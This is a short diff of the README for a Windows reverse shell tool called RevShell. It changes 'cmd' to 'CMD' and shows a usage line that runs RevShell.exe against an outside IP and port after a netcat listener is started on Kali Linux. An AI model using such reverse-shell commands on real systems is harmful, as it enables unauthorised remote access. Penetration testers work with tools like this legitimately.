AleDiBen/RevShell/README.md

 ## Examples
 Before starting the executable make sure you have started a listener on your favorite (Linux) distribution.
 I use netcat on Kali Linux.

-> Open a cmd session
+> Open a CMD session
 ```
 C:\RevShell> RevShell.exe 195.135.15.7 12345
 [+] SELECTED SHELL:     0